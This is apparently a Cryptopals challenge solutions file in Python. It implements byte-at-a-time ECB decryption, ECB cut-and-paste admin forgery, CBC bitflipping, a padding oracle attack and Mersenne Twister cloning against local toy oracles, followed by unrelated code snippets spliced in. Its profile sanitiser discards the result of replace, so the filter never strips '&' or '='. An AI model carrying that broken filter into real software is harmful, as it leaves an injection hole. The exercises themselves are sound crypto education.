cryptopals.generate_random_bytes(16)\n encrypted = cryptopals.encrypt_aes_with_custom_cbc(\n message, random_aes_key, random_iv\n )\n\n return encrypted, encoding_type\n\n for x in range(10):\n test, is_ecb = encrypt_oracle(b\"A\" * 212)\n testing = b\"\".join(test)\n\n testing = binascii.hexlify(testing)\n assert (is_ecb == \"ECB\") == cryptopals.detect_ecb_use(testing, len(test[0]))\n # print(\"Content encrypted as {0}. Is ECB?: {1}\".format(is_ecb, detect_ecb_use(testing, len(test[0]))))\n\n # print(test)\n\n\n@time_it\ndef challenge_12() -> None:\n \"\"\"\n Byte - at - a - time\n\n ECB decryption(Simple)\n Copy your oracle function to a new function that encrypts buffers under ECB mode using a\n consistent but unknown key (for instance, assign a single random key, once, to a global variable).\n\n Now take that same function and have it append to the plaintext, BEFORE ENCRYPTING, the\n following string:\n\n Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\n\n Spoiler alert. Do not decode this string now. Don't do it.\n\n Base64 decode the string before appending it. Do not base64\n decode the string by hand; make your code do it.The point is that you don't know its contents.\n\n What you have now is a function that produces:\n\n AES - 128 - ECB(your - string | | unknown - string, random - key)\n\n It turns out: you can decrypt \"unknown-string\" with repeated calls to the oracle function!\n\n Here's roughly how:\n\n Feed identical bytes of your-string to the function 1 at a time\n --- start with 1 byte (\"A\"), then \"AA\", then \"AAA\" and so on.\n\n 1. Discover the block size of the cipher. You know it, but do this step anyway\n 2. Detect that the function is using ECB. You already know, but do this step anyways.\n 3. Knowing the block size, craft an input block that is exactly 1 byte short (for instance, if the block size is\n 8 bytes, make \"AAAAAAA\"). Think about what the oracle function is going to put in that last byte position.\n 4. Make a dictionary of every possible last byte by feeding different strings to the oracle; for instance,\n \"AAAAAAAA\", \"AAAAAAAB\", \"AAAAAAAC\", remembering the first block of each invocation.\n 5. Match the output of the one-byte-short input to one of the entries in your dictionary. You've now discovered\n the first byte of unknown-string.\n 6. Repeat for the next byte.\n \"\"\"\n base64_encoded = (\n \"Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGll\"\n \"cyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\"\n )\n base64_decoded = binascii.a2b_base64(\n base64_encoded\n ) # base64.b64decode(base64_encoded)\n random_aes_key = cryptopals.generate_random_bytes(16)\n\n encrypted_blocks = cryptopals.encrypt_ecb_oracle(\n b\"\", base64_decoded, random_aes_key\n )\n\n result = cryptopals.decrypt_ecb_message_without_key(\n encrypted_blocks, base64_decoded, random_aes_key\n )\n\n assert (\n result\n == b\"Rollin' in my 5.0\\nWith my rag-top down so my hair can blow\\nThe girlies on standby\"\n b\" waving just to say hi\\nDid you stop? No, I just drove by\\n\\x01\"\n ), \"Decryption Failed!\"\n\n\n@time_it\ndef challenge_13() -> None:\n \"\"\"\n ECB cut-and-paste\n\n :return:\n \"\"\"\n\n def profile_for(user_input: str):\n \"\"\"\n Now write a function that encodes a user profile in that format, given an email address.\n\n You should have something like:\n\n profile_for(\"foo@bar.com\")\n\n ... and it should produce:\n\n {\n email: 'foo@bar.com',\n uid: 10,\n role: 'user'\n }\n ... encoded as:\n\n email=foo@bar.com&uid=10&role=user\n Your \"profile_for\" function should not allow encoding metacharacters (& and =).\n Eat them, quote them, whatever you want to do,\n but don't let people set their email address to \"foo@bar.com&role=admin\".\n :return:\n \"\"\"\n\n # Eat illegals\n illegals = \"&=\"\n for illegal in illegals:\n user_input.replace(illegal, \"\")\n\n user_profile = collections.OrderedDict()\n user_profile[\"email\"] = user_input\n user_profile[\"uid\"] = 10\n user_profile[\"role\"] = \"user\"\n\n items = [\"{0}={1}\".format(k, v) for k, v in user_profile.items()]\n user_text = \"&\".join(items)\n\n return user_text\n\n email = (\n \"theadminisfake.test@gmail.\" + \"admin{}\".format(\"\\x11\" * 11) + \"com\"\n ) # necessary to push 'user' to its own line\n profile = profile_for(email)\n cookie = cryptopals.create_structured_cookie(profile)\n\n # print(cookie)\n\n \"\"\"\n Now, two more easy functions. Generate a random AES key, then:\n A.\tEncrypt the encoded user profile under the key; \"provide\" that to the \"attacker\".\n B.\tDecrypt the encoded user profile and parse it.\n\n Using only the user input to profile_for() (as an oracle to generate \"valid\" ciphertexts)\n and the ciphertexts themselves, make a role=admin profile.\n \"\"\"\n random_aes_key = cryptopals.generate_random_bytes(16)\n keysize = len(random_aes_key)\n message = cryptopals.pkcs_7_padding(profile.encode(), keysize)\n for_attacker = cryptopals.encrypt_aes(message, random_aes_key)\n\n # print(\"For Attacker: {}\".format(for_attacker))\n\n # to_be_swizzled = pkcs_7_padding(for_attacker, len(random_aes_key))\n to_be_swizzled = [\n for_attacker[n : n + keysize] for n in range(0, len(for_attacker), keysize)\n ]\n # Reorder the ECB Blocks and throw away the regular user account :)\n final = list()\n final.append(to_be_swizzled[0])\n final.append(to_be_swizzled[1])\n final.append(to_be_swizzled[3])\n final.append(to_be_swizzled[2])\n\n for_me = cryptopals.decrypt_aes(b\"\".join(final), random_aes_key)\n\n assert (\n for_me == b\"email=theadminisfake.test@gmail.com&uid=10&\"\n b\"role=admin\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\\x11\"\n ), \"Admin account could not be hacked!\"\n\n\n@time_it\ndef challenge_14() -> object:\n \"\"\"\n Take your oracle function from #12. Now generate a random count of random bytes and prepend this string to every\n plaintext. You are now doing:\n\n AES-128-ECB(random-prefix || attacker-controlled || target-bytes, random-key)\n\n :return:\n \"\"\"\n\n base64_encoded = (\n \"Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGll\"\n \"cyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK\"\n )\n base64_decoded = binascii.a2b_base64(base64_encoded)\n random_aes_key = cryptopals.generate_random_bytes(16)\n random_prepend = cryptopals.generate_random_bytes(random.randint(1, 15))\n encrypted_blocks = cryptopals.encrypt_ecb_oracle(\n b\"\", base64_decoded, random_aes_key, prepend=random_prepend\n )\n\n # print(\"Padding: {}\".format(obtain_ecb_pkcs7_count(base64_decoded, random_aes_key, prepend=random_prepend)))\n cryptopals.obtain_ecb_prepend_padding_count(\n base64_decoded, random_aes_key, prepend=random_prepend\n )\n # print(decrypt_aes(b''.join(encrypted_blocks), random_aes_key))\n # print(\"Original Encrypted Blocks: {}\".format(len(encrypted_blocks)))\n\n result = cryptopals.decrypt_ecb_message_without_key(\n encrypted_blocks, base64_decoded, random_aes_key, prepend=random_prepend\n )\n assert base64_decoded == result.strip(\n b\"\\x01\"\n ), \"Decryption failed! {} != {}\".format(base64_decoded, result)\n\n\n@time_it\ndef challenge_15() -> None:\n tests = [\n b\"ICE ICE BABY\\x04\\x04\\x04\\x04\",\n b\"ICE ICE BABY\\x05\\x05\\x05\\x05\",\n b\"ICE ICE BABY\\x01\\x02\\x03\\x04\",\n b\"I\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\\x0f\",\n b\"YELLOW SUBMARINE\",\n ]\n\n expected_results = [b\"ICE ICE BABY\", b\"I\", b\"YELLOW SUBMARINE\"]\n\n received_results = list()\n for test in tests:\n try:\n received_results.append(cryptopals.pkcs_7_padding_verification(test))\n except ValueError:\n pass\n\n for item in received_results:\n assert item in expected_results, \"PKCS7 Padding Verification Failed.\"\n\n\n@time_it\ndef challenge_16() -> None:\n \"\"\"\n CBC bitflipping attacks\n Generate a random AES key.\n\n Combine your padding code and CBC code to write two functions.\n\n The first function should take an arbitrary input string, prepend the string:\n\n \"comment1=cooking%20MCs;userdata=\"\n .. and append the string:\n\n \";comment2=%20like%20a%20pound%20of%20bacon\"\n The function should quote out the \";\" and \"=\" characters.\n\n The function should then pad out the input to the 16-byte AES block length and encrypt it under the random AES key.\n\n The second function should decrypt the string and look for the characters \";admin=true;\" (or, equivalently, decrypt,\n split the string on \";\", convert each resulting string into 2-tuples, and look for the \"admin\" tuple).\n\n Return true or false based on whether the string exists.\n\n If you've written the first function properly, it should not be possible to provide user input to it that will\n generate the string the second function is looking for. We'll have to break the crypto to do that.\n\n Instead, modify the ciphertext (without knowledge of the AES key) to accomplish this.\n\n You're relying on the fact that in CBC mode, a 1-bit error in a ciphertext block:\n\n Completely scrambles the block the error occurs in\n Produces the identical 1-bit error(/edit) in the next ciphertext block.\n Stop and think for a second.\n Before you implement this attack, answer this question: why does CBC mode have this property?\n :return:\n \"\"\"\n\n def encrypt_using_cbc(message, key):\n prepend = r\"comment1=cooking%20MCs;userdata=\"\n cleaned = message.replace(\";\", \"\").replace(\"=\", \"\")\n append = r\";comment2=%20like%20a%20pound%20of%20bacon\"\n\n full_message = \"{}{}{}\".format(prepend, cleaned, append).encode()\n\n encrypted = cryptopals.encrypt_aes_with_custom_cbc(\n full_message, key, b\"YELLOW SUBMARINE\"\n )\n\n return encrypted\n\n def is_admin(encrypted, random_aes_key):\n\n decrypted = cryptopals.decrypt_aes_with_custom_cbc(\n b\"\".join(encrypted), random_aes_key, b\"YELLOW SUBMARINE\"\n )\n # print('FUN: {}'.format(decrypted[2]))\n return False if b\"\".join(decrypted).find(b\";admin=true;\") == -1 else True\n\n random_aes_key = cryptopals.generate_random_bytes(16)\n encrypted = encrypt_using_cbc(\"?admin?true\", random_aes_key)\n\n # for debugging info\n # decrypted = decrypt_aes_with_custom_cbc(b''.join(encrypted), random_aes_key, b'YELLOW SUBMARINE')\n\n # do something here to make ;admin=true exist in encrypted.\n success = False\n for index in range(0, 255):\n first_array = bytearray(encrypted[1])\n first_array[0] = index\n for index2 in range(0, 255):\n first_array[6] = index2\n encrypted[1] = bytes(first_array)\n result = is_admin(encrypted, random_aes_key)\n if result:\n # print(\"Hacked Using the following byte Manipulations: {}, {}\".format(index, index2))\n success = True\n break\n if success:\n break\n\n assert success is True, \"Unable to hack admin gate!\"\n\n\n@time_it\ndef challenge_17():\n \"\"\"\n https://en.wikipedia.org/wiki/Padding_oracle_attack\n http://robertheaton.com/2013/07/29/padding-oracle-attack/\n\n :return:\n \"\"\"\n\n class Server:\n iv = cryptopals.generate_random_bytes(16)\n key = cryptopals.generate_random_bytes(16)\n test_data = [\n b\"MDAwMDAwTm93IHRoYXQgdGhlIHBhcnR5IGlzIGp1bXBpbmc =\",\n b\"MDAwMDAxV2l0aCB0aGUgYmFzcyBraWNrZWQgaW4gYW5kIHRoZSBWZWdhJ3MgYXJlIHB1bXBpbic =\",\n b\"MDAwMDAyUXVpY2sgdG8gdGhlIHBvaW50LCB0byB0aGUgcG9pbnQsIG5vIGZha2luZw ==\",\n b\"MDAwMDAzQ29va2luZyBNQydzIGxpa2UgYSBwb3VuZCBvZiBiYWNvbg ==\",\n b\"MDAwMDA0QnVybmluZyAnZW0sIGlmIHlvdSBhaW4ndCBxdWljayBhbmQgbmltYmxl\",\n b\"MDAwMDA1SSBnbyBjcmF6eSB3aGVuIEkgaGVhciBhIGN5bWJhbA ==\",\n b\"MDAwMDA2QW5kIGEgaGlnaCBoYXQgd2l0aCBhIHNvdXBlZCB1cCB0ZW1wbw ==\",\n b\"MDAwMDA3SSdtIG9uIGEgcm9sbCwgaXQncyB0aW1lIHRvIGdvIHNvbG8 =\",\n b\"MDAwMDA4b2xsaW4nIGluIG15IGZpdmUgcG9pbnQgb2g =\",\n b\"MDAwMDA5aXRoIG15IHJhZy10b3AgZG93biBzbyBteSBoYWlyIGNhbiBibG93\",\n ]\n\n def get_encrypted_blocks(self):\n # The first function should\n # - select at random one of ten strings\n # - generate a random AES key (which it should save for all future encryptions),\n # - pad the string out to the 16-byte AES block size and\n # - CBC-encrypt it under that key,\n # - providing the caller the ciphertext and IV.\n\n # grab a random string\n random_string = self.test_data[random.randrange(0, len(self.test_data))]\n\n print(\"-\" * 128)\n print(\"PRIOR TO ENCRYPTION: {}\".format(random_string))\n print(\"PRIOR TO ENCRBASE64: {}\".format(binascii.a2b_base64(random_string)))\n\n # encrypt using CBC\n encrypted_blocks = cryptopals.encrypt_aes_with_custom_cbc(\n random_string, self.key, self.iv\n )\n\n return encrypted_blocks\n\n def decrypt_cookie(self, ciphertext):\n # Consume the ciphertext\n # decrypt it,\n # check its padding, and\n # return true or false depending on whether the padding is valid.\n blocks = cryptopals.decrypt_aes_with_custom_cbc(\n ciphertext, self.key, self.iv\n )\n message = b\"\".join(blocks)\n # print(\"{} (Decrypted)\".format(message))\n\n try:\n cryptopals.pkcs_7_padding_verification(message)\n except ValueError:\n return False\n\n return True\n\n server = Server()\n blocks = server.get_encrypted_blocks()\n\n def side_channel_attack(c1, c2):\n byte_items = []\n results = []\n for slot in range(1, 17):\n # print(\"Working on byte {}\".format(17-slot))\n found = False\n\n prefix = b\"-\" * (16 - slot)\n postfix = b\"\"\n\n for counter, b1 in enumerate(byte_items, 1):\n postfix += bytes([b1 ^ slot])\n\n for index in range(0, 256):\n if found is False:\n c1a = prefix + bytes([index]) + postfix\n # print(c1a)\n assert len(c1a) == 16, \"Expected 16 bytes -- got {}\".format(\n len(c1a)\n )\n\n ciphertext = b\"\".join((c1a, c2))\n # print(ciphertext)\n if server.decrypt_cookie(ciphertext):\n \"\"\"\n Let b_{-1} be the last byte of C_{1}.\n\n The attacker changes it as follows:\n b_-1 = b_-1 XOR z1 XOR 0x01, where\n z_{-1} is the guessed value of the last byte of P_{2}.\n \"\"\"\n\n # intermediate state\n i2a = index ^ slot\n\n # plaintext reveal\n p2 = c1[-slot] ^ i2a\n\n # These are the bytes that make up the generated encryption block\n byte_items.insert(0, index ^ slot)\n\n # Decrypted Letters\n results.insert(0, p2)\n found = True\n # print(\"{} - Found ['{}']: hex {}, int {}\".format(17 - slot, chr(p2), c1a[-slot], c1a[-slot]))\n else:\n break\n\n if len(byte_items) != slot:\n print(\"[FAILED] Was unable to find byte {} ....\".format(17 - slot))\n final_results = [chr(result) for result in results]\n # print(\"STRING DECRYPTED: {}\".format((b'.' * (17-slot)) + ''.join(final_results).encode()))\n print(\"server key: {}\".format(server.key))\n print(\"server iv: {}\".format(server.iv))\n return ([69] * (18 - slot)) + results\n\n return results\n\n results = []\n blocks.insert(0, server.iv)\n for c1, c2 in zip(blocks, blocks[1:]):\n result = side_channel_attack(c1, c2)\n if result:\n results.append(\"\".join([chr(item) for item in result]))\n\n print(\"-\" * 128)\n print(\"DECRYPTED: {}\".format(results))\n print(\"DECBASE64: {}\".format(binascii.a2b_base64(\"\".join(results))))\n print(\"-\" * 128)\n\n\n@time_it\ndef challenge_18():\n \"\"\"\n key = YELLOW SUBMARINE\n nonce = 0\n format = 64 bit unsigned little endian nonce, 64 bit little endian block count(byte count / 16)\n \"\"\"\n\n key = b\"YELLOW SUBMARINE\"\n ctr_encrypted = (\n b\"L77na/nrFsKvynd6HzOoG7GHTLXsTVu9qvY/2syLXzhPweyyMTJULu/6/kXX0KSvoOLSFQ==\"\n )\n ctr_encrypted = binascii.a2b_base64(ctr_encrypted)\n\n decrypted = cryptopals.aes_with_custom_ctr(ctr_encrypted, key, nonce=0)\n\n assert (\n decrypted == b\"Yo, VIP Let's kick it Ice, Ice, baby Ice, Ice, baby \"\n ), \"CTR Decryption failed!\"\n\n\n@time_it\ndef challenge_19() -> None:\n \"\"\"\n Attack this cryptosystem piecemeal: guess letters, use expected English language frequence to validate guesses,\n catch common English trigrams, and so on.\n :return:\n \"\"\"\n lines = [\n \"SSBoYXZlIG1ldCB0aGVtIGF0IGNsb3NlIG9mIGRheQ==\",\n \"Q29taW5nIHdpdGggdml2aWQgZmFjZXM=\",\n \"RnJvbSBjb3VudGVyIG9yIGRlc2sgYW1vbmcgZ3JleQ==\",\n \"RWlnaHRlZW50aC1jZW50dXJ5IGhvdXNlcy4=\",\n \"SSBoYXZlIHBhc3NlZCB3aXRoIGEgbm9kIG9mIHRoZSBoZWFk\",\n \"T3IgcG9saXRlIG1lYW5pbmdsZXNzIHdvcmRzLA==\",\n \"T3IgaGF2ZSBsaW5nZXJlZCBhd2hpbGUgYW5kIHNhaWQ=\",\n \"UG9saXRlIG1lYW5pbmdsZXNzIHdvcmRzLA==\",\n \"QW5kIHRob3VnaHQgYmVmb3JlIEkgaGFkIGRvbmU=\",\n \"T2YgYSBtb2NraW5nIHRhbGUgb3IgYSBnaWJl\",\n \"VG8gcGxlYXNlIGEgY29tcGFuaW9u\",\n \"QXJvdW5kIHRoZSBmaXJlIGF0IHRoZSBjbHViLA==\",\n \"QmVpbmcgY2VydGFpbiB0aGF0IHRoZXkgYW5kIEk=\",\n \"QnV0IGxpdmVkIHdoZXJlIG1vdGxleSBpcyB3b3JuOg==\",\n \"QWxsIGNoYW5nZWQsIGNoYW5nZWQgdXR0ZXJseTo=\",\n \"QSB0ZXJyaWJsZSBiZWF1dHkgaXMgYm9ybi4=\",\n \"VGhhdCB3b21hbidzIGRheXMgd2VyZSBzcGVudA==\",\n \"SW4gaWdub3JhbnQgZ29vZCB3aWxsLA==\",\n \"SGVyIG5pZ2h0cyBpbiBhcmd1bWVudA==\",\n \"VW50aWwgaGVyIHZvaWNlIGdyZXcgc2hyaWxsLg==\",\n \"V2hhdCB2b2ljZSBtb3JlIHN3ZWV0IHRoYW4gaGVycw==\",\n \"V2hlbiB5b3VuZyBhbmQgYmVhdXRpZnVsLA==\",\n \"U2hlIHJvZGUgdG8gaGFycmllcnM/\",\n \"VGhpcyBtYW4gaGFkIGtlcHQgYSBzY2hvb2w=\",\n \"QW5kIHJvZGUgb3VyIHdpbmdlZCBob3JzZS4=\",\n \"VGhpcyBvdGhlciBoaXMgaGVscGVyIGFuZCBmcmllbmQ=\",\n \"V2FzIGNvbWluZyBpbnRvIGhpcyBmb3JjZTs=\",\n \"SGUgbWlnaHQgaGF2ZSB3b24gZmFtZSBpbiB0aGUgZW5kLA==\",\n \"U28gc2Vuc2l0aXZlIGhpcyBuYXR1cmUgc2VlbWVkLA==\",\n \"U28gZGFyaW5nIGFuZCBzd2VldCBoaXMgdGhvdWdodC4=\",\n \"VGhpcyBvdGhlciBtYW4gSSBoYWQgZHJlYW1lZA==\",\n \"QSBkcnVua2VuLCB2YWluLWdsb3Jpb3VzIGxvdXQu\",\n \"SGUgaGFkIGRvbmUgbW9zdCBiaXR0ZXIgd3Jvbmc=\",\n \"VG8gc29tZSB3aG8gYXJlIG5lYXIgbXkgaGVhcnQs\",\n \"WWV0IEkgbnVtYmVyIGhpbSBpbiB0aGUgc29uZzs=\",\n \"SGUsIHRvbywgaGFzIHJlc2lnbmVkIGhpcyBwYXJ0\",\n \"SW4gdGhlIGNhc3VhbCBjb21lZHk7\",\n \"SGUsIHRvbywgaGFzIGJlZW4gY2hhbmdlZCBpbiBoaXMgdHVybiw=\",\n \"VHJhbnNmb3JtZWQgdXR0ZXJseTo=\",\n \"QSB0ZXJyaWJsZSBiZWF1dHkgaXMgYm9ybi4=\",\n ]\n\n # Generate a random key and encrypt the above base64 text\n random_key = cryptopals.generate_random_bytes(16)\n encrypted_messages = []\n for item in lines:\n message = binascii.a2b_base64(item)\n encrypted = cryptopals.aes_with_custom_ctr(message, random_key, nonce=0)\n encrypted_messages.append(encrypted)\n\n \"\"\"\n foo_BYTE XOR bar_BYTE = KEYSTREAM-BYTE\n And since the keystream is the same for every ciphertext:\n foo-BYTE XOR KEYSTREAM-BYTE = bar-BYTE\n \"\"\"\n key = []\n max_line_length = len(max(encrypted_messages, key=len))\n for index in range(0, max_line_length):\n scores = {}\n for guess in range(256):\n\n items = [\n chr(message[index] ^ guess)\n for message in encrypted_messages\n if len(message) > index\n ]\n score = cryptopals.english.score_text(\"\".join(items).encode())\n scores[guess] = score\n\n high_score = max(scores, key=lambda x: scores[x])\n if high_score > 0:\n key.append(bytes([high_score]))\n\n test_total_decrypt = []\n final_key = b\"\".join(key)\n keysize = len(final_key)\n for line, message in zip(lines, encrypted_messages):\n blocks = [message[n : n + keysize] for n in range(0, len(message), keysize)]\n decrypt = [cryptopals.decrypt_xor(block, final_key) for block in blocks]\n\n test_total_decrypt.append(\n cryptopals.compute_hamming_distance(\n b\"\".join(decrypt), binascii.a2b_base64(line)\n )\n )\n\n normalized_distance = sum(test_total_decrypt) / len(test_total_decrypt)\n assert (\n normalized_distance < 5\n ), \"Hamming Distance of {} suggests decryption failed.\".format(normalized_distance)\n # print(f\"Decrypted with a Hamming Distance from known clear text of {normalized_distance}\")\n\n\n@time_it\ndef challenge_20() -> None:\n \"\"\"\n Using 20.txt, find a similar set of Base64'd plaintext. Do with them exactly what you did with the first, but\n solve the problem differently. Instead of making spot guesses at to known plaintext, treat the collection of\n ciphertexts the same way you would repeating-key XOR.\n\n Obviously, CTR encryption appears different from repeated-ke XOR, but with a fixed nonce they are effectively\n the same thing.\n\n To exploit this:\n 1. take your collection of ciphertexts and\n 2. truncate them to a common length (the length of the smallest ciphertext will work).\n\n Solve the resulting concatenation of ciphertexts as if for repeating- key XOR, with a key size of the length of\n the ciphertext you XOR'd.\n \"\"\"\n key = cryptopals.generate_random_bytes(16)\n nonce = 0\n\n with open(\"data/20.txt\", \"r\") as handle:\n lines = [binascii.a2b_base64(line.strip()) for line in handle.readlines()]\n crypts = [cryptopals.aes_with_custom_ctr(line, key, nonce) for line in lines]\n\n # min_length = len(max(crypts, key=len))\n blocks = [crypt for crypt in crypts]\n\n transposed = cryptopals.transpose(blocks)\n\n # check each index for possible hits\n # if more than one hit -- check for score.\n\n keys = {}\n for index, block in enumerate(transposed):\n keys[index] = []\n for guess in range(255):\n items = [(item ^ guess) for item in block]\n count = [\n item\n for item in items\n if chr(item) in (string.ascii_letters + \" ,.'?:-;\")\n ]\n # if index == 10:\n # print(len(items), len(count), [chr(item) for item in items])\n\n keys[index].append([len(count), bytes([guess])])\n\n key = []\n for index in keys:\n key.append(max(keys[index], key=lambda x: x[0])[1])\n\n result = b\"\".join(key)\n print(result)\n\n for block in blocks:\n print(cryptopals.decrypt_xor(block, result))\n\n\n@time_it\ndef challenge_21():\n \"\"\"\n Implement the MT19937 Mersenne Twister RNG\n - https://en.wikipedia.org/wiki/Mersenne_Twister\n :return:\n \"\"\"\n\n x = cryptopals.MT19337(90210)\n\n assert x.extract_number() == 826079627\n\n\n@time_it\ndef challenge_22():\n \"\"\"\n - Wait a random number of seconds between, I don't know, 40 and 1000.\n - Seeds the RNG with the current Unix timestamp\n - Waits a random number of seconds again.\n - Returns the first 32 bit output of the RNG.\n :return:\n \"\"\"\n\n current_time = int(time.time())\n\n time.sleep(random.randint(10, 20))\n\n random_number = cryptopals.MT19337(current_time).extract_number()\n\n result = 0\n future_time = int(time.time())\n for index in range(1000):\n temp_time = future_time - index\n test_number = cryptopals.MT19337(temp_time).extract_number()\n if test_number == random_number:\n # print(\"Actual Seed: {}\".format(current_time))\n # print(\"Derived Seed: {} (Found in {} iterations)\".format(temp_time, index+1))\n result = temp_time\n break\n\n assert result == current_time\n\n\ndef challenge_23():\n \"\"\"\n Task: Clone an MT19937 RNG from its output\n\n The internal state of MT19937 consists of 624 32 bit integers.\n\n For each batch of 624 outputs, MT permutes that internal state. By permuting state regularly, MT19937\n achieves a period of 2**19937, which is Big.\n\n Each time MT19937 is tapped, an element of its internal state is subjected to a tempering function that\n diffuses bits through the result.\n\n The tempering function is invertible; you can write an \"untemper\" function that takes an MT19937 output and\n transforms it back into the corresponding element of the MT19937 state array.\n\n ****\n To invert the temper transform, apply the inverse of each of the operations in the temper transform in reverse\n order. There are two kinds of operations in the temper transform each applied twice; one is an XOR against a\n right-shifted value, and the other is an XOR against a left-shifted value AND'd with a magic number. So you'll\n need code to invert the \"right\" and the \"left\" operation.\n ***\n\n Once you have \"untemper\" working, create a new MT19937 generator, tap it for 624 outputs, untemper each of them\n to recreate the state of the generator, and splice that state into a new instance of the MT19937 generator.\n\n The new \"spliced\" generator should predict the values of the original.\n \"\"\"\n current_time = int(time.time())\n print(\"Current Time: \", current_time)\n MT = cryptopals.MT19337(current_time)\n random_number = MT.extract_number()\n random_number2 = MT.extract_number()\n print(random_number, random_number2)\n\n untemper = cryptopals.MT19337.untemper(random_number)\n\n print(\"\\n\")\n print(\" seed:\", current_time)\n print(\" tempered:\", random_number)\n print(\" tempered2:\", random_number2)\n print(\"unTempered:\", untemper)\n spliced_mt = cryptopals.MT19337(untemper)\n rn_01 = spliced_mt.extract_number()\n rn_02 = spliced_mt.extract_number()\n\n assert random_number2 == rn_02\n\n pass\n\n\nif __name__ == \"__main__\":\n\n # Set #1\n challenge_01()\n challenge_02()\n challenge_03()\n challenge_04()\n challenge_05()\n challenge_06()\n challenge_07()\n challenge_08()\n\n # set #2\n challenge_09()\n challenge_10()\n challenge_11()\n challenge_12()\n challenge_13()\n challenge_14()\n challenge_15()\n challenge_16()\n\n # set #3\n challenge_17()\n challenge_18()\n challenge_19()\n challenge_20()\n challenge_21()\n\n challenge_22()\n challenge_23()\n","repo_name":"jasonbrackman/matasano_crypto_challenges","sub_path":"challenges.py","file_name":"challenges.py","file_ext":"py","file_size_in_byte":36466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26986823321","text":"while True:\n try:\n line = input(\"Enter a line of char: \")\n l = len(line)\n a=[]\n for c in line:\n if c==\"\\'\":\n a.append(\" \")\n else:\n ab= chr(ord(c) - 7)\n a.append(ab)\n print(\"\".join(a))\n except EOFError:\n break\n","repo_name":"jayed87/UVa-solutions-python","sub_path":"458-the-decoder.py","file_name":"458-the-decoder.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38255550743","text":"#coding:utf-8 \nimport sys \nimport time\nfrom operator import add\nfrom pyspark import SparkContext\nimport os\n# import numpy as np\n# from pyspark.mllib.regression import LabeledPoint\ndef timeline(l):\n s=sorted(l,key=lambda x:x[0],reverse=False)\n re=[]\n for i in s:\n re.append(i[1])\n return re\ndef g2(l):\n s=set()\n for i in l[1]:\n s.add(i[1])\n if len(s)>1:\n return True\n else:\n return False\ndef lis2str(l):\n re=\"\"\n for i in l[0]:\n re+=str(i)+\",\"\n re+=str(l[1])\n return re\ndef change1(l,shape):\n cat=np.zeros(shape)\n l=sorted(l,key=lambda x:x[0],reverse=False)\n temp=\"\"\n count=0\n for i in range(shape):\n if i==0:\n temp=l[i][7]\n else:\n if l[i][7]!=temp and l[i][7]!=\"**\":\n count+=1\n cat[i]=1\n temp=l[i][7]\n temp=cat.tolist()\n temp.append(count)\n return temp\ndef extract_label(l):\n s=set()\n t=[]\n l=sorted(l,key=lambda x:x[0],reverse=False)\n for i in range(5,8):\n s.add(l[i][7])\n if len(s)>1:\n return (\"1\")\n else:\n return (\"0\")\ndef type(l):\n l=sorted(l,key=lambda x:x[0],reverse=False)\n s=set([i[7] for i in l[:6]])\n return len(s)\ndef toline(l):\n line=\"\"\n line+=l[0]\n for i in l[1]:\n line+=\",\"+i\n return line\ndef listadd(l):\n l[1].append(l[0])\n return l[1]\nif __name__ == \"__main__\":\n sc = SparkContext(appName=\"PythonWordCount\")\n line = sc.textFile(\"./kesci/user/g*\")\n records=line.map(lambda x:x.split(\",\"))\n records.cache()\n # train=records.filter(lambda x:x[0]<\"201507\")\n good=sc.textFile(\"./kesci/user/effectiveuser.csv\").map(lambda x:(x,1))\n t=records.map(lambda x:(x[1],[x[i] for i in [0,3,4,5,6,7]]))\\\n .groupByKey()\\\n .mapValues(list)\\\n .mapValues(lambda x:sorted(x,key=lambda a:a[0]))\\\n .flatMapValues(lambda x:x)\n # label=records.filter(lambda x:x[0]>\"201505\").map(lambda x:(x[1],x[7]))\\\n # .groupByKey()\\\n # .mapValues(list)\\\n # .mapValues(lambda x:\"1\" if len(set(x))>1 else \"0\")\n t=t.join(good).mapValues(lambda x:x[0]).map(toline)\n # for i in t.take(50):\n # print(i)\n t.coalesce(1).saveAsTextFile(\"./kesci/newraw\")\n print(\"******************OK***********************\"+str(label.count())+\",\"+str(t.count()))\n","repo_name":"colinlzh/unicome","sub_path":"getraw.py","file_name":"getraw.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17644461333","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 17 21:46:10 2019\n\n@author: akgill\n\"\"\"\n\nPORTION_DOWN_PAYMENT = 0.25\nTOTAL_COST = 1000000.0\nMONTHS=36\nR=0.04\nSEMI_ANNUAL_RAISE=0.07\n\n\ndef how_much_to_save_monthly():\n starting_salary = float(input(\"Enter your starting salary: \"))\n savings_needed = TOTAL_COST * PORTION_DOWN_PAYMENT\n \n # guesses in units of ten thousandths\n low_guess = 0 # 0.00% monthly savings rate\n high_guess = 10000 # 100.00% monthly savings rate\n \n # Before bisection search, check that it is possible to save enough at 100%\n # savings rate. If not, quit early.\n if (savings(starting_salary, high_guess/10000) < savings_needed):\n print(\"It is not possible to pay the down payment in three years.\")\n return\n \n mid_savings = 0\n steps = 0\n while (abs(mid_savings - savings_needed) > 100):\n steps += 1\n mid_guess = ((high_guess - 